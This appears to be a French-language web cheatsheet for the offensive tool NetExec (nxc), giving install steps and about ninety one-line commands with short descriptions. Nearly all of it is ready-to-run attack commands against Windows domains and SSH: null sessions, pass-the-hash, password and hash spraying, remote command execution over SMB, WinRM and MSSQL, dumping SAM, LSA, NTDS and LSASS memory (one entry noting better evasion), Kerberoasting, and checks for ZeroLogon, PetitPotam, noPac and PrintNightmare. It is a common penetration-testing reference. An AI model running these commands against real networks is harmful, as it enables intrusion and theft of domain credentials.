sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExecDescription: Installe NetExec proprement via pipx depuis le depot officiel.
Cheatsheets
Cheatsheet complete nxc : SMB, LDAP, MSSQL, WinRM, SSH. Auth, enumeration, exploitation et modules.
sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExecDescription: Installe NetExec proprement via pipx depuis le depot officiel.
nxc --versionDescription: Verifie que le binaire est accessible et affiche la version installee.
nxc --helpDescription: Affiche l'aide globale et la liste des protocoles disponibles.
nxc smb --helpDescription: Affiche toutes les options du module SMB.
nxc <protocol> $TARGET -u $USER -p $PASS [options]Description: Syntaxe commune a tous les protocoles.
nxc smb $TARGETDescription: Cible : IP unique, plage CIDR, range ou fichier avec -t targets.txt.
nxc smb $TARGET -u '' -p ''Description: Null session SMB : teste l'acces anonyme sans identifiants.
nxc ldap $TARGET -u '' -p ''Description: Null session LDAP : idem pour le protocole LDAP.
nxc smb $TARGET -u 'Guest' -p ''Description: Tente l'acces avec le compte Guest (souvent actif sur vieux postes).
nxc smb $TARGET -u $USER -p $PASSDescription: Authentification domaine classique user/password.
nxc smb $TARGET -u $USER -p $PASS --local-authDescription: Force l'authentification locale (hors contexte domaine).
nxc smb $TARGET -u $USER -p $PASS -d $DOMAINDescription: Specifies le domaine explicitement pour un contexte multi-domaines.
nxc smb $TARGET -u $USER -H $NTHASHDescription: Authentification via hash NT (Pass-the-Hash) sans connaitre le mot de passe en clair.
nxc smb $TARGET -u $USER -H $LMHASH:$NTHASHDescription: Format LM:NT complet si le LM hash est disponible.
nxc smb $TARGET -u $USER -H $NTHASH --local-authDescription: PTH en mode local-auth pour les comptes machine ou locaux.
nxc smb $TARGET -u $USER -p $PASS -kDescription: Force l'authentification Kerberos au lieu de NTLM.
nxc smb $TARGET -u $USER -p $PASS --use-kcacheDescription: Utilise le cache Kerberos existant (ccache) plutot que de re-s'authentifier.
KRB5CCNAME=$CCACHE nxc smb $TARGET -u $USER -p '' --use-kcacheDescription: Injecte un ccache specifique (post-getTGT/getST) pour l'authentification.
nxc smb $TARGET -u users.txt -p passwords.txtDescription: Cree le produit cartesien user x password (attention aux lockouts).
nxc smb $TARGET -u users.txt -p passwords.txt --no-bruteforceDescription: Teste user[i]/pass[i] en mode paire lineaire, sans croisement.
nxc smb $TARGET -u users.txt -H hashes.txt --no-bruteforceDescription: Spray de hashes NT contre une liste d'utilisateurs, un hash par user.
nxc smb $TARGET -u users.txt -p passwords.txt --continue-on-successDescription: Continue apres le premier succes, utile pour identifier tous les comptes valides.
nxc smb $TARGETDescription: Sonde SMB : hostname, domaine, OS, signing et version SMB.
nxc smb $CIDRDescription: Discovery reseau : identifie tous les hotes SMB actifs sur un /24.
nxc smb $TARGET -u $USER -p $PASS --usersDescription: Liste les comptes utilisateurs du domaine via SMB.
nxc smb $TARGET -u $USER -p $PASS --groupsDescription: Liste les groupes du domaine et leurs membres.
nxc smb $TARGET -u $USER -p $PASS --local-groupsDescription: Enumere les groupes locaux de la machine cible.
nxc smb $TARGET -u $USER -p $PASS --rid-bruteDescription: Brute-force des RID pour decouvrir des comptes meme sans acces annuaire.
nxc smb $TARGET -u $USER -p $PASS --sessionsDescription: Affiche les sessions SMB actives sur la cible.
nxc smb $TARGET -u $USER -p $PASS --loggedon-usersDescription: Identifie les utilisateurs actuellement connectes sur la machine.
nxc smb $TARGET -u $USER -p $PASS --pass-polDescription: Recupere la politique de mot de passe du domaine (lockout threshold, etc.).
nxc smb $TARGET -u $USER -p $PASS --gen-relay-list relay.txtDescription: Genere une liste d'hotes SMB ne forcant pas la signature (cibles relay).
nxc smb $TARGET -u $USER -p $PASS --sharesDescription: Enumere les partages accessibles et les permissions (READ/WRITE).
nxc smb $TARGET -u '' -p '' --sharesDescription: Meme chose en null session pour detecter les partages publics.
nxc smb $TARGET -u $USER -p $PASS -M spider_plusDescription: Spider recursif de tous les partages accessibles, liste tous les fichiers.
nxc smb $TARGET -u $USER -p $PASS -M spider_plus -o READ_ONLY=falseDescription: Spider avec telechargement automatique des fichiers trouves.
nxc smb $TARGET -u $USER -p $PASS --get-file '\\share\path\file.txt' /local/dest.txtDescription: Telecharge un fichier depuis un partage SMB distant.
nxc smb $TARGET -u $USER -p $PASS --put-file /local/file.exe '\\share\path\file.exe'Description: Uploade un fichier local vers un partage SMB distant.
nxc smb $TARGET -u $USER -p $PASS -x 'whoami'Description: Execute une commande shell sur la cible via SMB (CreateProcess).
nxc smb $TARGET -u $USER -p $PASS -X 'Get-Process'Description: Execute une commande PowerShell sur la cible via SMB.
nxc smb $TARGET -u $USER -p $PASS -x 'whoami' --exec-method smbexecDescription: Force le mode d'execution smbexec (moins bruyant que psexec).
nxc smb $TARGET -u $USER -p $PASS -x 'whoami' --exec-method wmiexecDescription: Force le mode d'execution WMI (pas de service cree).
nxc smb $TARGET -u $USER -p $PASS --samDescription: Dump les hashes du SAM local (comptes locaux uniquement).
nxc smb $TARGET -u $USER -p $PASS --lsaDescription: Dump les secrets LSA (mots de passe services, cached creds, etc.).
nxc smb $TARGET -u $USER -p $PASS --ntdsDescription: Dump le NTDS.dit via VSS pour recuperer tous les hashes du domaine (DC uniquement).
nxc smb $TARGET -u $USER -p $PASS --ntds --user $TARGET_USERDescription: Dump uniquement le hash d'un utilisateur specifique depuis NTDS.
nxc smb $TARGET -u $USER -p $PASS -M lsassyDescription: Dump LSASS en memoire via lsassy pour extraire les credentials en clair.
nxc smb $TARGET -u $USER -p $PASS -M nanodumpDescription: Dump LSASS via nanodump (evasion meilleure qu'un dump classique).
nxc smb $TARGET -u $USER -p $PASS -M gpp_passwordDescription: Cherche des mots de passe en clair dans les GPP (SYSVOL).
nxc smb $TARGET -u $USER -p $PASS -M dpapiDescription: Tente de dechiffrer les secrets DPAPI de l'utilisateur connecte.
nxc smb $TARGET -u $USER -p $PASS -M zerologonDescription: Detecte la vulnerabilite ZeroLogon (CVE-2020-1472) sur le DC.
nxc smb $TARGET -u $USER -p $PASS -M petitpotamDescription: Teste la coercition PetitPotam (Printer Spooler / EfsRpc).
nxc smb $TARGET -u $USER -p $PASS -M nopacDescription: Detecte la vulnerabilite noPac (CVE-2021-42278/42287).
nxc smb $TARGET -u $USER -p $PASS -M printnightmareDescription: Detecte PrintNightmare (CVE-2021-1675) sur le spooler d'impression.
nxc smb $TARGET -u $USER -p $PASS -M enum_avDescription: Enumere les produits antivirus installes sur la machine cible.
nxc ldap $TARGET -u $USER -p $PASS --usersDescription: Liste les utilisateurs AD via LDAP.
nxc ldap $TARGET -u $USER -p $PASS --groupsDescription: Liste les groupes AD et leurs membres.
nxc ldap $TARGET -u $USER -p $PASS --admin-countDescription: Trouve les objets proteges par AdminSDHolder (adminCount=1).
nxc ldap $TARGET -u $USER -p $PASS --trusted-for-delegationDescription: Identifie les comptes avec unconstrained delegation.
nxc ldap $TARGET -u $USER -p $PASS --password-not-requiredDescription: Trouve les comptes sans politique de mot de passe obligatoire.
nxc ldap $TARGET -u $USER -p $PASS --find-delegationDescription: Decouvre toutes les configurations de delegation (constrained/unconstrained/RBCD).
nxc ldap $TARGET -u $USER -p $PASS --kerberoasting kerberoast.txtDescription: Recupere les TGS des comptes avec SPN pour crackage offline (Kerberoasting).
nxc ldap $TARGET -u $USER -p $PASS --asreproast asrep.txtDescription: Recupere les AS-REP des comptes sans pre-auth Kerberos.
nxc ldap $TARGET -u $USER -p $PASS --bloodhound -c AllDescription: Collecte toutes les donnees BloodHound CE (users, groups, sessions, ACLs, GPOs, trusts).
nxc ldap $TARGET -u $USER -p $PASS --bloodhound -c DCOnlyDescription: Collecte uniquement les donnees DC (plus rapide, moins de bruit reseau).
nxc ldap $TARGET -u $USER -p $PASS -M adcsDescription: Enumere les Certificate Authority et templates ADCS, signale les mauvaises configs ESC.
nxc ldap $TARGET -u $USER -p $PASS -M maqDescription: Verifie le Machine Account Quota (combien de comptes machine on peut creer).
nxc ldap $TARGET -u $USER -p $PASS --lapsDescription: Lit les mots de passe LAPS v1/v2 si les ACL le permettent.
nxc ldap $TARGET -u $USER -p $PASS --gmsaDescription: Enumere les Group Managed Service Accounts et leurs attributs.
nxc ldap $TARGET -u $USER -p $PASS --gmsa-convert-idDescription: Convertit un ID gMSA en nom lisible.
nxc ldap $TARGET -u $USER -p $PASS --gmsa-decrypt-lsaDescription: Dechiffre les secrets gMSA stockes dans LSA si les droits le permettent.
nxc mssql $TARGET -u $USER -p $PASSDescription: Authentification SQL Server en mode Windows (domaine).
nxc mssql $TARGET -u $USER -p $PASS --local-authDescription: Authentification SQL locale (SQL login, pas Windows auth).
nxc mssql $TARGET -u $USER -p $PASS -d $DOMAINDescription: Force le domaine pour l'authentification Windows sur MSSQL.
nxc mssql $TARGET -u $USER -p $PASS -q 'SELECT @@version'Description: Execute une requete SQL directement.
nxc mssql $TARGET -u $USER -p $PASS -q 'SELECT name FROM sys.databases'Description: Liste toutes les bases de donnees disponibles sur l'instance.
nxc mssql $TARGET -u $USER -p $PASS --rid-bruteDescription: Brute-force des RID pour cartographier les logins SQL et Windows.
nxc mssql $TARGET -u $USER -p $PASS -x 'whoami'Description: Execute une commande OS via xp_cmdshell (doit etre active ou activable).
nxc mssql $TARGET -u $USER -p $PASS -X 'Get-Content C:\Windows\win.ini'Description: Execute du PowerShell via xp_cmdshell.
nxc mssql $TARGET -u $USER -p $PASS --get-file 'C:\path\to\file.txt' /local/dest.txtDescription: Telecharge un fichier depuis la cible via MSSQL (BULK INSERT / OPENROWSET).
nxc mssql $TARGET -u $USER -p $PASS --put-file /local/file.exe 'C:\Windows\Temp\file.exe'Description: Uploade un fichier local sur la cible via MSSQL.
nxc winrm $TARGET -u $USER -p $PASSDescription: Valide les credentials sur WinRM et verifie si le compte est admin.
nxc winrm $TARGET -u $USER -H $NTHASHDescription: Validation via hash NT sur WinRM (Pass-the-Hash).
nxc winrm $TARGET -u users.txt -p passwords.txt --no-bruteforceDescription: Spray de credentials sur WinRM en mode paire lineaire.
nxc winrm $TARGET -u $USER -p $PASS -x 'whoami'Description: Execute une commande shell sur la cible via WinRM.
nxc winrm $TARGET -u $USER -p $PASS -X 'Get-LocalUser'Description: Execute du PowerShell sur la cible via WinRM.
nxc ssh $TARGET -u $USER -p $PASSDescription: Valide des credentials SSH sur la cible.
nxc ssh $TARGET -u $USER --key-file ~/.ssh/id_rsaDescription: Authentification SSH par cle privee.
nxc ssh $TARGET -u $USER -p $PASS -x 'whoami'Description: Execute une commande sur la cible via SSH.